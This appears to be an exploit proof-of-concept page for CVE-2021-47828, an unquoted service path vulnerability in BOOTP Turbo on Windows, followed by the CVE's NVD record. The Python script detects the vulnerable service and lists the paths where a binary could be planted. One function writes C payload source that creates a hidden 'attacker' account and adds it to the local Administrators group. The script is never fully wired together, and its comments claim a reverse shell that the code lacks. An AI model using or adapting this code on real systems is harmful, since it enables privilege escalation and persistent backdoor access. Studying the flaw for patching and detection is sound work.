CVE-2021-47828

#!/usr/bin/env python3 # CVE-2021-47828 PoC - BOOTP Turbo Unquoted Service Path # This PoC demonstrates how to exploit the unquoted service path vulnerability import os import sys import subprocess import ctypes def check_vulnerability(): """ Check if the target system is vulnerable to CVE-2021-47828 Checks if BOOTP Turbo service has an unquoted path containing spaces """ try: # Query Windows Registry for BOOTP Turbo service configuration result = subprocess.run( ['sc', 'qc', 'BOOTPTurbo'], capture_output=True, text=True ) if result.returncode == 0: output = result.stdout # Check if path contains spaces and is not quoted if 'BINARY_PATH_NAME' in output: for line in output.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() # Check if path has spaces and is not quoted if (' ' in path) and (not path.startswith('"')): print(f"[+] Vulnerable path detected: {path}") return True, path print("[-] Service not found or not vulnerable") return False, None except Exception as e: print(f"[-] Error checking vulnerability: {e}") return False, None def create_malicious_executable(output_path): """ Generate malicious executable that creates a reverse shell Note: This is for educational purposes only """ malicious_code = f''' #include <windows.h> #include <stdio.h> int main() {{ // Payload: Create admin user or execute reverse shell // In real attack, this would be the actual malicious code MessageBox(NULL, "BOOTP Turbo Service Executed", "CVE-2021-47828", MB_OK); // Execute privileged operation system("net user attacker P@ssw0rd123 /add"); system("net localgroup Administrators attacker /add"); return 0; }} ''' with open(output_path, 'w') as f: f.write(malicious_code) print(f"[+] Malicious executable created at: {output_path}") def main(): print("="*60) print("CVE-2021-47828 PoC - BOOTP Turbo Unquoted Service Path") print("="*60) # Step 1: Check if vulnerable print("\n[1] Checking for vulnerability...") vulnerable, service_path = check_vulnerability() if vulnerable: print(f"[+] Target is VULNERABLE") print(f"[+] Service path: {service_path}") # Step 2: Identify potential injection points print("\n[2] Analyzing path for injection points...") path_parts = service_path.split('\\') for i, part in enumerate(path_parts): if ' ' in part: potential_path = '\\'.join(path_parts[:i+1]) + '.exe' print(f" [!] Potential injection: {potential_path}") else: print("[-] Target is NOT vulnerable") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2021-47828", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:07.867", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "BOOTP Turbo 2.0.0.1253 contains an unquoted service path vulnerability in its Windows service configuration. Attackers can exploit the unquoted path to execute arbitrary code with elevated LocalSystem privileges during system startup or reboot."}, {"lang": "es", "value": "BOOTP Turbo 2.0.0.1253 contiene una vulnerabilidad de ruta de servicio sin comillas en su configuración de servicio de Windows. Los atacantes pueden explotar la ruta sin comillas para ejecutar código arbitrario con privilegios elevados de LocalSystem durante el inicio o reinicio del sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49851", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/bootp-turbo-bootptexe-unquoted-service-path", "source": "[email protected]"}, {"url": "https://www.weird-solutions.com", "source": "[email protected]"}]}}